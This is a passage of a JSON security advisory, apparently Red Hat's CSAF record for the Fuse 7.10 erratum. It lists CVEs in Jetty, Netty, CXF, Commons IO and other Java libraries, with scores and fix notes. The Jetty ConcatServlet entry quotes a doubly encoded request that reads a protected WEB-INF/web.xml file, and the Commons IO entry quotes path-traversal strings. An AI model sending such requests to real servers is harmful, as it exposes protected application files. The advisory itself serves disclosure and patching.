"url": "https://access.redhat.com/security/cve/CVE-2021-28164"
},
{
"category": "external",
"summary": "RHBZ#1945712",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945712"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-28164",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-28164"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-28164",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28164"
},
{
"category": "external",
"summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5",
"url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5"
}
],
"release_date": "2021-04-01T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jetty: Ambiguous paths can access WEB-INF"
},
{
"cve": "CVE-2021-28169",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2021-06-09T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1971016"
}
],
"notes": [
{
"category": "description",
"text": "For Eclipse Jetty versions \u003c= 9.4.40, \u003c= 10.0.2, \u003c= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. For example a request to `/concat?/%2557EB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jetty: requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jetty.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated\n\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nRed Hat CodeReady Studio 12 is not affected by this flaw because it does not ship the vulnerable components (ConcatServlet or WelcomeFilter) of jetty.\n\nRed Hat Enterprise Linux 8 is not affected by this flaw because it does not ship the vulnerable components (ConcatServlet or WelcomeFilter) of jetty.\n\nRed Hat Enterprise Linux 7 ships the vulnerable component of jetty, but only in the optional repository and thus this flaw is out of support scope for Red Hat Enterprise Linux 7.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-28169"
},
{
"category": "external",
"summary": "RHBZ#1971016",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1971016"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-28169",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-28169"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-28169",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28169"
}
],
"release_date": "2021-06-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jetty: requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory"
},
{
"cve": "CVE-2021-28170",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-05-26T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1965497"
}
],
"notes": [
{
"category": "description",
"text": "In the Jakarta Expression Language implementation 3.0.3 and earlier, a bug in the ELParserTokenManager enables invalid EL expressions to be evaluated as if they were valid.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jakarta-el: ELParserTokenManager enables invalid EL expressions to be evaluate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-28170"
},
{
"category": "external",
"summary": "RHBZ#1965497",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1965497"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-28170",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-28170"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-28170",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28170"
},
{
"category": "external",
"summary": "https://securitylab.github.com/advisories/GHSL-2020-021-jakarta-el/",
"url": "https://securitylab.github.com/advisories/GHSL-2020-021-jakarta-el/"
}
],
"release_date": "2021-04-01T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jakarta-el: ELParserTokenManager enables invalid EL expressions to be evaluate"
},
{
"cve": "CVE-2021-29425",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2021-04-12T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1948752"
}
],
"notes": [
{
"category": "description",
"text": "In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "apache-commons-io: Limited path traversal in Apache Commons IO 2.2 to 2.6",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "While the apache-commons-io package included in Red Hat Enterprise Linux 8 Maven App Stream contains the vulnerable code, it is not used in any way by Maven or other packages in this module. This package is not an API component of Maven, thus the affected code can not be reached in any supported scenario.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-29425"
},
{
"category": "external",
"summary": "RHBZ#1948752",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948752"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-29425",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-29425"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-29425",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29425"
}
],
"release_date": "2021-04-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "apache-commons-io: Limited path traversal in Apache Commons IO 2.2 to 2.6"
},
{
"cve": "CVE-2021-30129",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-07-12T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1981527"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability in sshd-core of Apache Mina SSHD allows an attacker to overflow the server causing an OutOfMemory error. This issue affects the SFTP and port forwarding features of Apache Mina SSHD version 2.0.0 and later versions. It was addressed in Apache Mina SSHD 2.7.0",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "mina-sshd-core: Memory leak denial of service in Apache Mina SSHD Server",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Critical flaws.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-30129"
},
{
"category": "external",
"summary": "RHBZ#1981527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1981527"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-30129",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-30129"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-30129",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30129"
}
],
"release_date": "2021-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "mina-sshd-core: Memory leak denial of service in Apache Mina SSHD Server"
},
{
"cve": "CVE-2021-30468",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2021-06-16T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1973392"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability in the JsonMapObjectReaderWriter of Apache CXF allows an attacker to submit malformed JSON to a web service, which results in the thread getting stuck in an infinite loop, consuming CPU indefinitely. This issue affects Apache CXF versions prior to 3.4.4; Apache CXF versions prior to 3.3.11.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "CXF: Denial of service vulnerability in parsing JSON via JsonMapObjectReaderWriter",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP) the openshift4/ose-logging-elasticsearch6 container bundles the vulnerable version of apache-cxf, but OCP 4.6 is Out Of Support Scope (OOSS) for Moderate and Low impact vulnerabilities because it is now in the Maintenance Phase of the support, hence this component is marked as ooss. Starting in 4.7 this component is delivered as part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8 container) and is not affected by this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-30468"
},
{
"category": "external",
"summary": "RHBZ#1973392",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1973392"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-30468",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-30468"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-30468",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30468"
},
{
"category": "external",
"summary": "http://cxf.apache.org/security-advisories.data/CVE-2021-30468.txt.asc?version=1\u0026modificationDate=1623835369690\u0026api=v2",
"url": "http://cxf.apache.org/security-advisories.data/CVE-2021-30468.txt.asc?version=1\u0026modificationDate=1623835369690\u0026api=v2"
}
],
"release_date": "2021-06-16T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "CXF: Denial of service vulnerability in parsing JSON via JsonMapObjectReaderWriter"
},
{
"cve": "CVE-2021-34428",
"cwe": {
"id": "CWE-613",
"name": "Insufficient Session Expiration"
},
"discovery_date": "2021-06-22T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1974891"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was discovered in the jetty-server, where if an exception is thrown from the SessionListener#sessionDestroyed() method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts, this could result in a session not being invalidated and a shared-computer application being left logged in. The highest threat from this vulnerability is to data confidentiality and integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jetty: SessionListener can prevent a session from being invalidated breaking logout",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jetty. Since the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix. This may be fixed in the future.\n\nOCP 3.11 is out of the support scope for Moderate and Low impact vulnerabilities because is already in the Maintenance Support phase, hence the affected OCP 3.11 component has been marked as wontifx.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-34428"
},
{
"category": "external",
"summary": "RHBZ#1974891",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1974891"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-34428",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-34428"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-34428",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34428"
},
{
"category": "external",
"summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m6cp-vxjx-65j6",
"url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m6cp-vxjx-65j6"
}
],
"release_date": "2021-06-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "Applications should catch all Throwables within their SessionListener#sessionDestroyed() implementations.",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "jetty: SessionListener can prevent a session from being invalidated breaking logout"
},
{
"cve": "CVE-2021-37136",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-09-14T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2004133"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s netty-codec due to size restrictions for decompressed data in the Bzip2Decoder. By sending a specially-crafted input, a remote attacker could cause a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In the OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack ship the vulnerable version of netty-codec package. Since the release of OCP 4.6, the Metering product has been deprecated [1], so the affected components are marked as wontfix. This may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-37136"
},
{
"category": "external",
"summary": "RHBZ#2004133",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-37136",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37136"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"
}
],
"release_date": "2021-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data"
},
{
"cve": "CVE-2021-37137",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-09-14T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2004135"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Netty\u0027s netty-codec due to unrestricted chunk lengths in the SnappyFrameDecoder. By sending a specially-crafted input, a remote attacker could cause excessive memory usage resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-37137"
},
{
"category": "external",
"summary": "RHBZ#2004135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-37137",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37137"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"
}
],
"release_date": "2021-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way"
},
{
"cve": "CVE-2021-37714",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-08-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1995259"
}
],
"notes": [
{
"category": "description",
"text": "jsoup is a Java library for working with HTML. Those using jsoup versions prior to 1.14.2 to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack. The issue is patched in version 1.14.2. There are a few available workarounds. Users may rate limit input parsing, limit the size of inputs based on system resources, and/or implement thread watchdogs to cap and timeout parse runtimes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsoup: Crafted input may cause the jsoup HTML and XML parser to get stuck",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-37714"
},
{
"category": "external",
"summary": "RHBZ#1995259",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1995259"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-37714",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37714"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37714",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37714"
},
{
"category": "external",
"summary": "https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c",
"url": "https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c"
}
],
"release_date": "2021-08-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
